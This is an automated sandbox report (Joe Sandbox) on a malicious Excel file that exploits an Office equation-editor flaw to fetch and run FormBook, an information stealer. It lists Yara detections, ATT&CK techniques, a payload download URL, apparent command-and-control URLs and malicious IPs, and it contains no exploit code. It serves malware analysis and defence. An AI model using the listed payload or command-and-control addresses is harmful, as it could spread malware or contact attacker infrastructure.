Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Windows Service1	Windows Service1	Masquerading111	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Process Injection612	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol23	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information41	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	System Information Discovery113	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
P. I.xlsx	31%	ReversingLabs	Document-Word.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://198.23.212.188/reg/vbc.exe	100%	Avira URL Cloud	malware
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://www.teleeducationforafghanistan.com/coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ==	0%	Avira URL Cloud	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://www.snhdt.net/coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh	0%	Avira URL Cloud	safe
http://p.zhongsou.com/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
myecovet.com	34.102.136.180	true	true	unknown
thevirginiahomesource.com	198.101.172.217	true	true	unknown
penrosecondos-official.com	101.100.209.140	true	true	unknown
www.kapkwata.com	154.215.9.186	true	true	unknown
www.teleeducationforafghanistan.com	74.220.199.6	true	true	unknown
reachlocal.cloudbackend.net	104.130.255.68	true	true	unknown
www.penrosecondos-official.com	unknown	unknown	true	unknown
www.snhdt.net	unknown	unknown	true	unknown
www.myecovet.com	unknown	unknown	true	unknown
www.thevirginiahomesource.com	unknown	unknown	true	unknown
www.teddij.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.23.212.188/reg/vbc.exe	true	Avira URL Cloud: malware	unknown
http://www.teleeducationforafghanistan.com/coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ==	true	Avira URL Cloud: safe	unknown
http://www.snhdt.net/coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2139033957.000000000239E000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://coinmarketcap.com/api/	vbc.exe, vbc.exe, 00000005.00000002.2188294879.0000000000B82000.00000020.00020000.sdmp, svchost.exe, 00000007.00000002.2350236075.00000000005FC000.00000004.00000020.sdmp	false		high
http://www.abril.com.br/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.2161003996.000000000861C000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp	false		high
http://search.espn.go.com/	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.myspace.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false		high
http://p.zhongsou.com/favicon.ico	explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
101.100.209.140	unknown	Singapore	58621	VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG	true
104.130.255.68	unknown	United States	33070	RMH-14US	true
198.23.212.188	unknown	United States	36352	AS-COLOCROSSINGUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
74.220.199.6	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
154.215.9.186	unknown	Seychelles	62468	VPSQUANUS	true
198.101.172.217	unknown	United States	19994	RACKSPACEUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323360
Start date:	26.11.2020
Start time:	21:21:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	P. I.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@9/6@7/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 37.5% (good quality ratio 35.4%) Quality average: 73.7% Quality standard deviation: 29.6%
HCA Information:	Successful, ratio: 95% Number of executed functions: 91 Number of non-executed functions: 44
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/323360/sample/P. I.xlsx

Simulations

Behavior and APIs

Time	Type	Description
21:22:00	API Interceptor	52x Sleep call for process: EQNEDT32.EXE modified
21:22:02	API Interceptor	123x Sleep call for process: vbc.exe modified
21:22:28	API Interceptor	230x Sleep call for process: svchost.exe modified
21:23:07	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.130.255.68	7New PO's 3.exe	Get hash	malicious	Browse	www.ravennahub.net/no/?004=W4AmBrEus9upSXA3UFjZAed3kISJc8znyYaKtYnCAT8OZ2b1zRI+80PWf0jEyvjW0vJJ0P4WwUh0wzcz&w0=9rQlzVNptHwh
104.130.255.68	59New PO's 3319971.exe	Get hash	malicious	Browse	www.ravennahub.net/no/?w21=W4AmBrEus9upSXA3UFjZAed3kISJc8znyYaKtYnCAT8OZ2b1zRI+80PWf0jEyvjW0vJJ0P4WwUh0wzcz&5j=7nsDG
198.23.212.188	EME_PO.39134.xlsx	Get hash	malicious	Browse	198.23.212.188/reg/vbc.exe
	Order List.xlsx	Get hash	malicious	Browse	198.23.212.188/reg/vbc.exe
